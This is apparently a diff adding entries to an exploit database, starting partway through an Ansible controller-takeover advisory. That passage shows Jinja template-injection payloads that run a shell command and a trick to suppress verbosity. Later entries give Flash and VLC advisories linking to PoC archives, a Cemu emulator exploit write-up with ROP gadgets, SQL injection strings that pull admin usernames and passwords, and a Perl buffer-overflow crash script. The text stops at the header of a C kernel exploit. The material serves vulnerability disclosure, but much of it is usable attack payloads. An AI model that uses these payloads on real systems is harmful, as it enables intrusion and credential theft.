    # assume that host_name is the same as inventory_hostname
    'host_name': socket.gethostname(),
    'host_vars': INTERPRETER_FACTS,
 }
 # [1] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/plugins/strategy/__init__.py#L447
 # [2] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/plugins/strategy/__init__.py#L580
 Bypass #2: Conditionals
 -----------------------
 Ansible actions allow for conditionals. If we know the exact contents of a
 "when" clause, and we register it as a fact, a special case checks whether the
 "when" clause matches a variable [1]. In that case it replaces it with its
 contents and evaluates [2] them.
 # Known conditionals, separated by newlines
 known_conditionals_str = """
 ansible_os_family == 'Debian'
 ansible_os_family == "Debian"
 ansible_os_family == 'RedHat'
 ansible_os_family == "RedHat"
 ansible_distribution == "CentOS"
 result|failed
 item > 5
 foo is defined
 """
 known_conditionals = [x.strip() for x in known_conditionals_str.split('\n')]
 for known_conditional in known_conditionals:
    data['ansible_facts'][known_conditional] = LOOKUP
 [1] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/playbook/conditional.py#L118
 [2] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/playbook/conditional.py#L125
 Bypass #3: Template injection in stat module
 --------------------------------------------
 The template module/action merges its results with those of the stat module.
 This allows us to bypass [1][2][3] the stripping of magic variables from
 ansible_facts [4], because they're at an unexpected location in the result tree.
 data.update({
    'stat': {
        'exists': True,
        'isdir': False,
        'checksum': {
            'rc': 0,
            'ansible_facts': INTERPRETER_FACTS,
        },
    }
 })
 # [1] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/plugins/action/template.py#L39
 # [2] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/plugins/action/template.py#L49
 # [3] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/plugins/action/template.py#L146
 # [4] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/plugins/action/__init__.py#L678
 Bypass #4: Template injection by changing jinja syntax
 ------------------------------------------------------
 Remote facts always get quoted. Set_fact unquotes them by evaluating them.
 UnsafeProxy was designed to defend against unquoting by transforming jinja
 syntax into jinja comments, effectively disabling injection.
 Bypass the filtering of "{{" and "{%" by changing the jinja syntax [1][2]. The
 {{}} is needed to make it look like a variable [3].  This works against:
 - set_fact: foo="{{ansible_os_family}}"
 - command: echo "{{foo}}
 data['ansible_facts'].update({
    'exploit_set_fact': True,
    'ansible_os_family': "#jinja2:variable_start_string:'[[',variable_end_string:']]',block_start_string:'[%',block_end_string:'%]'\n{{}}\n[[ansible_host]][[lookup('pipe', '" + PAYLOAD  + "')]]",
 })
 # [1] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/template/__init__.py#L66
 # [2] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/template/__init__.py#L469
 # [3] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/template/__init__.py#L308
 Bypass #5: Template injection in dict keys
 ------------------------------------------
 Strings and lists are properly cleaned up, but dictionary keys are not [1]. This
 works against:
 - set_fact: foo="some prefix {{ansible_os_family}} and/or suffix"
 - command: echo "{{foo}}
 The prefix and/or suffix are needed in order to turn the
 dict into a string, otherwise the value would remain a dict.
 data['ansible_facts'].update({
    'exploit_set_fact': True,
    'ansible_os_family': { "{{ %s }}" % LOOKUP: ''},
 })
 # [1] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/vars/unsafe_proxy.py#L104
 Bypass #6: Template injection using safe_eval
 ---------------------------------------------
 There's a special case for evaluating strings that look like a list or dict [1].
 Strings that begin with "{" or "[" are evaluated by safe_eval [2]. This allows
 us to bypass the removal of jinja syntax [3]: we use the whitelisted Python to
 re-create a bit of Jinja template that is interpreted.
 This works against:
 - set_fact: foo="{{ansible_os_family}}"
 - command: echo "{{foo}}
 data['ansible_facts'].update({
    'exploit_set_fact': True,
    'ansible_os_family': """[ '{'*2 + "%s" + '}'*2 ]""" % LOOKUP,
 })
 # [1] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/template/__init__.py#L334
 # [2] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/template/safe_eval.py
 # [3] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/template/__init__.py#L229
 Issue: Disabling verbosity
 --------------------------
 Verbosity can be set on the controller to get more debugging information. This
 verbosity is controlled through a custom fact. A host however can overwrite this
 fact and set the verbosity level to 0, hiding exploitation attempts.
 data['_ansible_verbose_override'] = 0
 # [1] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/plugins/callback/default.py#L99
 # [2] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/plugins/callback/default.py#L208
 Issue: Overwriting files
 ------------------------
 Roles usually contain custom facts that are defined in defaults/main.yml,
 intending to be overwritten by the inventory (with group and host vars). These
 facts can be overwritten by the remote host, due to the variable precedence [1].
 Some of these facts may be used to specify the location of a file that will be
 copied to the remote host. The attacker may change it to /etc/passwd. The
 opposite is also true, he may be able to overwrite files on the Controller. One
 example is the usage of a password lookup with where the filename contains a
 variable [2].
 [1] http://docs.ansible.com/ansible/playbooks_variables.html#variable-precedence-where-should-i-put-a-variable
 [2] http://docs.ansible.com/ansible/playbooks_lookups.html#the-password-lookup
 Mitigation
 ----------
 Computest is not aware of mitigations short of installing fixed versions of the
 software.
 Resolution
 ----------
 Ansible has released new versions that fix the vulnerabilities described in
 this advisory: version 2.1.4 for the 2.1 branch and 2.2.1 for the 2.2 branch.
 Conclusion
 ----------
 The handling of Facts in Ansible suffers from too many special cases that allow
 for the bypassing of filtering. We found these issues in just hours of code
 review, which can be interpreted as a sign of very poor security. However, we
 don't believe this is the case.
 The attack surface of the Controller is very small, as it consists mainly of the
 Facts. We believe that it is very well possible to solve the filtering and
 quoting of Facts in a sound way, and that when this has been done, the
 opportunity for attack in this threat model is very small. 
 Furthermore, the Ansible security team has been understanding and professional
 in their communication around this issue, which is a good sign for the handling
 of future issues.
 Timeline
 --------
 2016-12-08	First contact with Ansible security team
 2016-12-09	First contact with Redhat security team (secalert@redhat.com)
 2016-12-09	Submitted PoC and description to security@ansible.com
 2016-12-13	Ansible confirms issue and severity
 2016-12-15	Ansible informs us of intent to disclose after holidays
 2017-01-05	Ansible informs us of disclosure date and fix versions
 2017-01-09	Ansible issues fixed version
--- a/platforms/multiple/dos/41008.txt
+++ b/platforms/multiple/dos/41008.txt
@ -0,0 +1,65 @@
 Source: https://cosig.gouv.qc.ca/en/cosig-2017-01-en/
 #####################################################################################
 # Application: Adobe Flash Player
 # Platforms: Windows,OSX
 # Versions: 24.0.0.186 and earlier
 # Author: Francis Provencher of COSIG
 # Website: https://cosig.gouv.qc.ca/en/advisory/
 # Twitter: @COSIG_
 # Date: January 10, 2017
 # CVE-2017-2930
 # COSIG-2016-35
 #####################################################################################
 1) Introduction
 2) Report Timeline
 3) Technical details
 4) POC
 #####################################################################################
 ================
 1) Introduction
 ================
 Adobe Flash Player (labeled Shockwave Flash in Internet Explorer and Firefox) is a freeware software for using content created
 on the Adobe Flash platform, including viewing multimedia, executing rich Internet applications, and streaming video and audio.
 Flash Player can run from a web browser as a browser plug-in or on supported mobile devices.[7] Flash Player was created by Macromedia
 and has been developed and distributed by Adobe Systems since Adobe acquired Macromedia.
 (https://en.wikipedia.org/wiki/Adobe_Flash_Player)
 #####################################################################################
 ============================
 2) Rapport de Coordination
 ============================
 2016-11-13: Francis Provencher of COSIG report this vulnerability to Adobe PSIRT;
 2016-11-14: Adobe PSIRT confirm this vulnerability;
 2017-01-10: Adobe publish a patch (APSB17-02);
 2017-01-10: Advisory released by COSIG;
 #####################################################################################
 =====================
 3) Technical details
 =====================
 The vulnerability allows a remote attacker to execute malicious code or access to a part of the dynamically allocated memory using a user interaction
 visiting a Web page or open a specially crafted SWF file, an attacker is able to create an “out of bound” memory corruption. A file with an “ActionRecord”
 structure that contain an invalid value in “ActionGetURL2” could lead to remote code execution in the context of the current user.
 #####################################################################################
 ===========
 4) POC:
 ===========
 https://cosig.gouv.qc.ca/wp-content/uploads/2017/01/COSIG-2017-01.zip
 https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41008.zip
 ####################################################################################
--- a/platforms/multiple/dos/41012.txt
+++ b/platforms/multiple/dos/41012.txt
@ -0,0 +1,65 @@
 Source: https://cosig.gouv.qc.ca/en/cosig-2017-01-en/
 #####################################################################################
 # Application: Adobe Flash Player
 # Platforms: Windows,OSX
 # Versions: 24.0.0.186 and earlier
 # Author: Francis Provencher of COSIG
 # Website: https://cosig.gouv.qc.ca/en/advisory/
 # Twitter: @COSIG_
 # Date: January 10, 2017
 # CVE-2017-2930
 # COSIG-2016-35
 #####################################################################################
 1) Introduction
 2) Report Timeline
 3) Technical details
 4) POC
 #####################################################################################
 ================
 1) Introduction
 ================
 Adobe Flash Player (labeled Shockwave Flash in Internet Explorer and Firefox) is a freeware software for using content created
 on the Adobe Flash platform, including viewing multimedia, executing rich Internet applications, and streaming video and audio.
 Flash Player can run from a web browser as a browser plug-in or on supported mobile devices.[7] Flash Player was created by Macromedia
 and has been developed and distributed by Adobe Systems since Adobe acquired Macromedia.
 (https://en.wikipedia.org/wiki/Adobe_Flash_Player)
 #####################################################################################
 ============================
 2) Rapport de Coordination
 ============================
 2016-11-13: Francis Provencher of COSIG report this vulnerability to Adobe PSIRT;
 2016-11-14: Adobe PSIRT confirm this vulnerability;
 2017-01-10: Adobe publish a patch (APSB17-02);
 2017-01-10: Advisory released by COSIG;
 #####################################################################################
 =====================
 3) Technical details
 =====================
 The vulnerability allows a remote attacker to execute malicious code or access to a part of the dynamically allocated memory using a user interaction
 visiting a Web page or open a specially crafted SWF file, an attacker is able to create an “out of bound” memory corruption. A file with an “ActionRecord”
 structure that contain an invalid value in “ActionGetURL2” could lead to remote code execution in the context of the current user.
 #####################################################################################
 ===========
 4) POC:
 ===========
 https://cosig.gouv.qc.ca/wp-content/uploads/2017/01/COSIG-2017-01.zip
 https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41012.zip
 ####################################################################################
--- a/platforms/multiple/local/41021.txt
+++ b/platforms/multiple/local/41021.txt
@ -0,0 +1,69 @@
 For those who only care about one thing: [the PoC is here.](https://rol.im/kpwned.zip)
 Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41021.zip
 ## Overview
 Cemu is a closed-source Wii U emulator developed by Exzap. New versions are released to those who donate to him via his Patreon first, then to the public one week later. According to its official website, Cemu "is not intended for general use yet", however it can run some games well.
 It HLEs the Wii U OS APIs. For those who don't know, the Wii U runs executables in a modified ELF format that include additional PE-like import and export sections. Basically, the HLE here means each exported function from each shared library has been reimplemented, and runs in native code. That's a pretty large attack surface! So, when looking for bugs, I decided to start there.
 ## Finding bugs in Cemu HLE API emulation
 Obviously, the first thing to do is to find where the API exports are set up so all of them can be annotated in IDA. I found a function at `0x1400AEDC0` (before relocation, cemu.exe is compiled with ASLR) that I labeled `set_up_emulated_API`. It takes three arguments: a pointer to a hashed (or obfuscated) shared library name, a pointer to a hashed (or obfuscated) exported function name, and a pointer to the function used for implementation. This function has a nice debug `printf` where it printed out the library name and exported function name, so I did things the long way and set a breakpoint there in x64dbg and labeled all the ~620(!) functions by hand. This took the better part of a day (however I did take breaks.)
 Once I had all the functions labeled, I could go ahead and start looking for bugs. It was nice from my perspective that the emulated API functions did all the grunt work of endianness conversion of arguments and return values, so I didn't have to do anything of the sort myself. I first decided to check the more interestingly (for me) named functions, not long later I'd found a bug.
 ### sysapp!_SYSGetSystemApplicationTitleId
 ```c
 uint64_t _SYSGetSystemApplicationTitleId(uint32_t index);
 ```
 The implementation of this function just sets up a large array of title IDs (a title ID is a 64 bit integer that identifies "something that runs on the console", like a system application, firmware component or game, this has been used by Nintendo since the Wii and DSi, on console and handheld respectively) on the stack, then indexes it using the provided argument **without checking** and returns the array[index] to the emulator. What a perfect infoleak, to defeat ASLR later!
 Exploiting this seems easy, just get the return address from the stack (index `37`), but it seems this isn't totally reliable, so instead I make a dummy call, then use index `52`, which seems to return an address inside the `cemu.exe` `.text` more reliably.
 ### padscore!KPADSetConnectCallback
 ```c
 uint32_t KPADSetConnectCallback(uint32_t index,uint32_t value)
 ```
 With an infoleak obtained, I just needed to find some (semi-)arbitrary write, and this took annoyingly longer to find. I found a few bugs that seemed promising but ultimately turned out to be unexploitable. Finally, after checking some of the functions not related to the OS, I found this function. Basically, it writes to an array of 32-bit integers (obviously the intended use of that array is function pointers inside the emulated system), in the `.data` section, with no checking of the provided index. Even better, it returns the old value (although I never needed to use this functionality when exploiting).
 The array is unfortunately near the end of `.data`, but that doesn't really matter, as it's stored *before* a nice array of KPAD C++ objects with vtables that I can clobber -- and if a pointer inside one of the objects happens to not be NULL, this same function makes a vtable call twice! Even better!
 ## Exploitation
 My PoC clobbers the first KPAD object (player 1 gamepad): it nulls out the checked pointer so no vtable calls are made while things are being overwritten, it overwrites the vtable pointers, sets up the ROP chain, sets up the stack pivot, makes that pointer non-NULL, and makes a dummy call to `KPADSetConnectCallback` to get ROP.
 Heh, I just made that sound easy. It wasn't.
 Let's see, it was annoying to find a stack pivot in the first place? But then I found the perfect pair of gadgets:
 ```
 0x000000014015d404 : add rcx, 0x10 ; jmp qword ptr [rax]
 0x0000000140228371 : push rcx ; pop rsp ; ret
 ```
 When the first one gets called, `rcx` has the address of the vtable array, and `rax` has the address of the first element of the vtable array (which isn't actually used, so it's a perfect place to put a gadget address).
 The ROP chain is written using `KPADSetConnectCallback` just like everything else, all this is written into a part of memory that contains UTF-16LE strings for controller mappings, that can only be seen if you open the controller settings. The ROP chain itself just grabs the address of the shellcode inside emulated RAM, `memcpy`s it to RWX memory allocated for the dynamic recompiler, and jumps there. Sure, it doesn't work if you deliberately disable the dynamic recompiler, but firstly, who even does that?!, and secondly, I'll leave the making of a ROP chain that uses `VirtualAlloc` to someone else if they wish.
 The shellcode itself is just metasploit `windows/x64/exec` running `calc.exe`. Nothing special.
 One final thing: when testing, I noticed that the emulator crashed if controller one was set up properly. It's because I initially thought the pointer that got checked for being NULL was a boolean or something else, and I'd only zeroed out the lower 32 bits of it. Whoops.
 ## Compiling the PoC
 Linked at the top of the page is an archive including the PoC itself as `calc.rpx` plus source plus modified and additional import library dependencies (as source and binaries). I used [wut](https://github.com/decaf-emu/wut) to make the PoC which obviously depends on [devkitPro/devkitPPC](http://devkitpro.org/). After compiling wut successfully I had to make library additions, as both of the vulnerable functions were not included in the library set. Luckily enough it was very easy to make additions to the import libraries.
 ## Timeline
 2016-12-30: started reversing  
 2016-12-31: found exploits  
 2017-01-01: made PoC, made initial contact with developer  
 2017-01-02: developer replies, said fixes have been made  
 2017-01-02: asked for release date  
 2017-01-02: reply: release date unknown, "in 1-2 weeks maybe"  
 2017-01-09: release to patrons, public disclosure
--- a/platforms/php/webapps/27110.txt
+++ b/platforms/php/webapps/27110.txt
@ -4,5 +4,4 @@ Eggblog is prone to multiple input validation vulnerabilities. These issues are
 Successful exploitation of these vulnerabilities could result in a compromise of the application, disclosure or modification of data, the theft of cookie-based authentication credentials. They may also permit an attacker to exploit vulnerabilities in the underlying database implementation. An attacker could also exploit this issue to control how the site is rendered to the user; other attacks are also possible. 
-http://www.example.com/eggblog/home/blog.php?id=
+http://www.example.com/eggblog/home/blog.php?id=70'% 20union%20select% 201,2,3,4,5, 6,7/*
 70'% 20union%20select% 201,2,3,4,5, 6,7/*
--- a/platforms/php/webapps/40999.txt
+++ b/platforms/php/webapps/40999.txt
@ -3,7 +3,6 @@
 # Google Dork: My Php Dating
 # Date:09.01.2017
 # Vendor Homepage: http://www.phponlinedatingsoftware.com/demo.htm
 # Tested on: http://www.phponlinedatingsoftware.com/demo/
 # Script Name: My Php Dating
 # Script Version: 2.0
 # Script Buy Now: http://www.phponlinedatingsoftware.com/order.htm
--- a/platforms/php/webapps/41007.html
+++ b/platforms/php/webapps/41007.html
@ -3,7 +3,6 @@
 # Google Dork: FMyLife Clone Script
 # Date:10.01.2017
 # Vendor Homepage: http://alstrasoft.com/fmylife-pro.htm
 # Tested on: http://www.tellaboutit.com/admin/
 # Script Name: FMyLife Clone Script (Pro Edition)
 # Script Version: 1.1
 # Script Buy Now: http://www.hotscripts.com/listing/fmylife-clone-script-pro-edition/   
--- a/platforms/php/webapps/41009.txt
+++ b/platforms/php/webapps/41009.txt
@ -0,0 +1,39 @@
 # Exploit Title: Starting Page 1.3 "Add a Link" - SQL Injection
 # Date: 11-01-2017
 # Software Link: http://software.friendsinwar.com/downloads.php?cat_id=2&download_id=11<http://software.friendsinwar.com/downloads.php?cat_id=2&download_id=11>
 # Exploit Author: Ben Lee
 # Contact: benlee9@outlook.com
 # Category: webapps
 # Tested on: Win7
 1. Description
 The vulnerable file is "link_req_2.php",all the post parameters do not get filtered,then do sql query。
 2. Vulnerable parameters:
 '$_POST[category]','$_POST[name]','$_POST[url]','$_POST[description]','$_POST[email]'
 3.Proof of Concept:
 Url:http://www.example.com/StartingPage/link_req_2.php
 Post data:
 [category=1' AND (select 1 from(select count(*),concat((select(select(select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e)from sp_admin limit 0,1))from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND 'a'='a&name=abc&email=admin@admin.com&url=www.xxx.com&description=helloworld]
 [cid:4be0cc87-4612-4096-ad49-cc18d8cb4033]
 Best Regards!
 Ben Lee
--- a/platforms/php/webapps/41010.txt
+++ b/platforms/php/webapps/41010.txt
@ -0,0 +1,14 @@
 # Vulnerability: My link trader - SQL Injection
 # Date: 11.01.2017
 # Vendor Homepage:
 http://software.friendsinwar.com/scripts_example/my_link_trader/
 # Tested on: Kali Linux 2016.2
 # Author: Dawid Morawski
 # Website: http://www.morawskiweb.pl
 # Contact: dawid.morawski1990@gmail.com
 #########################
 #########################
 # SQL Injection/POC :
 # Vulnerable Parametre : id
 # http://localhost/[PATH]/out.php?id=[SQL]
--- a/platforms/php/webapps/41023.txt
+++ b/platforms/php/webapps/41023.txt
@ -0,0 +1,21 @@
 # # # # # 
 # Vulnerability: Travel Portal Script v9.33 - SQL Injection Web Vulnerability
 # Google Dork: Travel Portal Script
 # Date:11.01.2017
 # Vendor Homepage: http://itechscripts.com/travel-portal-script/
 # Script Name: Travel Portal Script
 # Script Version: v9.33
 # Script Buy Now: http://itechscripts.com/travel-portal-script/
 # Author: Ihsan Sencan
 # Author Web: http://ihsan.net
 # Mail : ihsan[beygir]ihsan[nokta]net
 # # # # #
 # 
 # SQL Injection/Exploit :
 # http://localhost/[PATH]/pages.php?id=[SQL]
 # http://localhost/[PATH]/hotel.php?hid=[SQL]
 # http://localhost/[PATH]/holiday.php?hid=[SQL]
 # E.t.c.... Other files, too. There are security vulnerabilities.
 # Category,User E.t.c.. Add/Edit/Delete There are security vulnerabilities.
 # 
 # # # # # 
--- a/platforms/php/webapps/41024.txt
+++ b/platforms/php/webapps/41024.txt
@ -0,0 +1,19 @@
 # # # # # 
 # Vulnerability: Movie Portal Script v7.35 - SQL Injection Web Vulnerability
 # Google Dork: Movie Portal Script
 # Date:11.01.2017
 # Vendor Homepage: http://itechscripts.com/movie-portal-script/
 # Script Name: Movie Portal Script
 # Script Version: v7.35
 # Script Buy Now: http://itechscripts.com/movie-portal-script/
 # Author: Ihsan Sencan
 # Author Web: http://ihsan.net
 # Mail : ihsan[beygir]ihsan[nokta]net
 # # # # #
 # 
 # SQL Injection/Exploit :
 # http://localhost/[PATH]/artist.php?a=[SQL]
 # http://localhost/[PATH]/movie.php?f=[SQL]
 # E.t.c.... Other files, too. There are security vulnerabilities.
 # Category,User E.t.c.. Add/Edit/Delete There are security vulnerabilities.
 # # # # # 
--- a/platforms/php/webapps/41027.txt
+++ b/platforms/php/webapps/41027.txt
@ -0,0 +1,18 @@
 # Vulnerability: Dating Script v3.25 - SQL Injection
 # Date: 11.01.2017
 # Software link: http://itechscripts.com/dating-script/
 # Demo: http://dating.itechscripts.com
 # Price: 199$
 # Category: webapps
 # Exploit Author: Dawid Morawski
 # Website: http://www.morawskiweb.pl
 # Contact: dawid.morawski1990@gmail.com
 #######################################
 1. Description
 An attacker can exploit this vulnerability to read from the database.
 2. SQL Injection / Proof of Concept:
 Vulnerable Parametre: id
 http://localhost/[PATH]/see_more_details.php?id=[SQL]
--- a/platforms/windows/dos/41018.txt
+++ b/platforms/windows/dos/41018.txt
@ -0,0 +1,204 @@
 Document Title:
 ===============
 Boxoft Wav v1.1.0.0 - Buffer Overflow Vulnerability
 References (Source):
 ====================
 https://www.vulnerability-lab.com/get_content.php?id=2027
 Release Date:
 =============
 2017-01-09
 Vulnerability Laboratory ID (VL-ID):
 ====================================
 2027
 Common Vulnerability Scoring System:
 ====================================
 5.8
 Product & Service Introduction:
 ===============================
 Boxoft Wav to MP3 Converter is an 100% free powerful audio conversion tool that lets you to batch convert WAV file to high 
 quality MP3 audio formats, It is equipped with a standard audio compressed encoder, you can select bitrate settings and 
 convert multiple files at once. Another convenience feature is hot directory (Watch Folder to convert Audio); it can be 
 converted to mp3 format automatically when the source wav files are written to a specified monitored directory.
 (Copy of the Vendor Homepage: http://www.boxoft.com/wav-to-mp3/ )
 Abstract Advisory Information:
 ==============================
 The vulnerability laboratory core research team discovered a local buffer overflow vulnerability in the official Boxoft Wav to MP3 v1.1.0.0 software.
 Vulnerability Disclosure Timeline:
 ==================================
 2017-01-09:	Public Disclosure (Vulnerability Laboratory)
 Discovery Status:
 =================
 Published
 Affected Product(s):
 ====================
 Boxoft
 Product: Wav to MP3 - Player (Software) 1.1.0.0
 Exploitation Technique:
 =======================
 Local
 Severity Level:
 ===============
 High
 Technical Details & Description:
 ================================
 A local buffer overflow vulnerability has been discovered in the official Boxoft Wav to MP3 (freeware) V1.1.0.0 software.
 The local vulnerability allows local attackers to overwrite the registers to compromise the local software system process.
 The classic unicode buffer overflow vulnerability is located in the `Add` function of the `Play` module. Local attackers are 
 able to load special crafted files that overwrites the eip register to compromise the local system process of the software.
 An attacker can manipulate thebit EIP register to execute the next instruction of their choice. Attackers are able to execute 
 arbitrary code with the privileges of the software process. Local attackers can exploit the issue by an include of a 18kb unicode 
 payload as txt file to add for the play module. 
 The security risk of the vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 5.8.
 Exploitation of the vulnerability requires a low privilege or restricted system user account without user interaction. 
 Successful exploitation of the vulnerability results in computer system manipulation and compromise of the computer system.
 Proof of Concept (PoC):
 =======================
 The buffer overflow vulnerability can be exploited by local attackers with restricted system user account and without user interaction.
 For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
 Manual steps to reproduce the vulnerability ...
 1.  Download and install the "setup(free-wav-to-mp3)" file
 2.  Run the poc code via active perl or perl
 3.  A file format "poc.txt" will be created
 4.  Click "ADD" and upload the (poc.txt) 
    Name > POC.txt
    Size > 18KB
    Full file name : C:UsersDellDesktopPoc.txt
 5.  Click "Play" 
 Note: Software will crash with an unhandled exception and critical access violation
 6. Successful reproduce of the local buffer overflow vulnerability!
 PoC: Exploitation (Perl)
 #!/usr/bin/perl
 my $Buff = "x41" x 9000;
 open(MYFILE,'>>poc.txt');
 print MYFILE $Buff;
 close(MYFILE);
 print "SaifAllah benMassaoud";
 --- Debug Logs [WinDBG] ---
 (1d10.1d3c): Access violation - code c0000005 (first chance)
 First chance exceptions are reported before any exception handling.
 This exception may be expected and handled.
 eax=00000000 ebx=00000000 ecx=31347831 edx=7769660d esi=00000000 edi=00000000
 eip=31347831 esp=0012f70c ebp=0012f72c iopl=0         nv up ei pl zr na pe nc
 cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210246
 31347831 ??              ???
 0012f720: ntdll!RtlRaiseStatus+c8 (7769660d)
 0012faf4: 31347831
 Invalid exception stack at 34783134
 0:000> d 0012faf4
 0012faf4  34 31 78 34 31 78 34 31-78 34 31 78 34 31 78 34  41x41x41x41x41x4
 0012fb04  31 78 34 31 78 34 31 78-34 31 78 34 31 78 34 31  1x41x41x41x41x41
 0012fb14  78 34 31 78 34 31 78 34-31 78 34 31 78 34 31 78  x41x41x41x41x41x
 0012fb24  34 31 78 34 31 78 34 31-78 34 31 78 34 31 78 34  41x41x41x41x41x4
 0012fb34  31 78 34 31 78 34 31 78-34 31 78 34 31 78 34 31  1x41x41x41x41x41
 0012fb44  78 34 31 78 34 31 78 34-31 78 34 31 78 34 31 78  x41x41x41x41x41x
 0012fb54  34 31 78 34 31 78 34 31-78 34 31 78 34 31 78 34  41x41x41x41x41x4
 0012fb64  31 78 34 31 78 34 31 78-34 31 78 34 31 78 34 31  1x41x41x41x41x41
 0:000>kb
 Following frames may be wrong.
 0012f708 776965f9 0012f7f4 0012faf4 0012f810 0x31347831
 0012f72c 776965cb 0012f7f4 0012faf4 0012f810 ntdll!RtlRaiseStatus+0xb4
 0012f7dc 77696457 0012f7f4 0012f810 0012f7f4 ntdll!RtlRaiseStatus+0x86
 0012f7e0 0012f7f4 0012f810 0012f7f4 0012f810 ntdll!KiUserExceptionDispatcher+0xf
 0012f7e4 0012f810 0012f7f4 0012f810 c0000005 0x12f7f4
 0012f7f4 00000000 00000000 78313478 00000002 0x12f810
 --- [CRASH - wavtomp3.exe] ---
  Problem Event Name:	APPCRASH
  Application Name:	wavtomp3.exe
  Application Version:	1.1.0.0
  Application Timestamp:	2a425e19
  Fault Module Name:	StackHash_e98d
  Fault Module Version:	0.0.0.0
  Fault Module Timestamp:	00000000
  Exception Code:	c0000005
  Exception Offset:	31347831
  OS Version:	6.1.7600.2.0.0.256.1
  Locale ID:	1033
  Additional Information 1:	e98d
  Additional Information 2:	e98dfca8bcf81bc1740adb135579ad53
  Additional Information 3:	6eab
  Additional Information 4:	6eabdd9e0dc94904be3b39a1c0583635
 Note: The access violation with the exception and followup offsets shows that the ecx & eip was overwritten.
 Security Risk:
 ==============
 The security risk of the local buffer overflow vulnerability in the Boxoft Wav to MP3 software is estimated as high. (CVSS 5.8)
 Credits & Authors:
 ==================
 Vulnerability Laboratory [Research Team] - SaifAllah benMassaoud (http://www.vulnerability-lab.com/show.php?user=SaifAllahbenMassaoud)
 Disclaimer & Information:
 =========================
 The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed 
 or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable 
 in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab 
 or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for 
 consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, 
 deface websites, hack into databases or trade with stolen data.
 Domains:    www.vulnerability-lab.com 		- www.vuln-lab.com 						- www.evolution-sec.com
 Section:    magazine.vulnerability-lab.com 	- vulnerability-lab.com/contact.php 				- evolution-sec.com/contact
 Social:	    twitter.com/vuln_lab		- facebook.com/VulnerabilityLab 				- youtube.com/user/vulnerability0lab
 Feeds:	    vulnerability-lab.com/rss/rss.php 	- vulnerability-lab.com/rss/rss_upcoming.php 			- vulnerability-lab.com/rss/rss_news.php
 Programs:   vulnerability-lab.com/submit.php 	- vulnerability-lab.com/list-of-bug-bounty-programs.php 	- vulnerability-lab.com/register.php
 Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. 
 Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
 Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark 
 of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get a ask permission.
 				    Copyright © 2017 | Vulnerability Laboratory - [Evolution Security GmbH]™
 -- 
 VULNERABILITY LABORATORY - RESEARCH TEAM
 SERVICE: www.vulnerability-lab.com
--- a/platforms/windows/dos/41025.txt
+++ b/platforms/windows/dos/41025.txt
@ -0,0 +1,25 @@
 In modules/codec/adpcm.c, VLC can be made to perform an out-of-bounds
 write with user-controlled input.
 The function DecodeAdpcmImaQT at adpcm.c:595 allocates a buffer which
 is filled with bytes from the input stream. However, it does not check
 that the number of channels in the input stream is less than or equal
 to the size of the buffer, resulting in an out-of-bounds write. The
 number of channels is clamped at <= 5.
 adpcm_ima_wav_channel_t channel[2];
 ...
 for( i_ch = 0; i_ch < p_dec->fmt_in.audio.i_channels; i_ch++ )
 {
    channel[i_ch].i_predictor  = (int16_t)((( ( p_buffer[0] << 1 )|(
 p_buffer[1] >> 7 ) ))<<7);
    channel[i_ch].i_step_index = p_buffer[1]&0x7f;
 ...
 The mangling of the input p_buffer above and in
 AdpcmImaWavExpandNibble() makes this difficult to exploit, but there
 is a potential for remote code execution via a malicious media file.
 POC:
 https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41025.mov
--- a/platforms/windows/local/41015.c
+++ b/platforms/windows/local/41015.c
@ -0,0 +1,820 @@
 /*
 Source: https://ricklarabee.blogspot.com/2017/01/virtual-memory-page-tables-and-one-bit.html
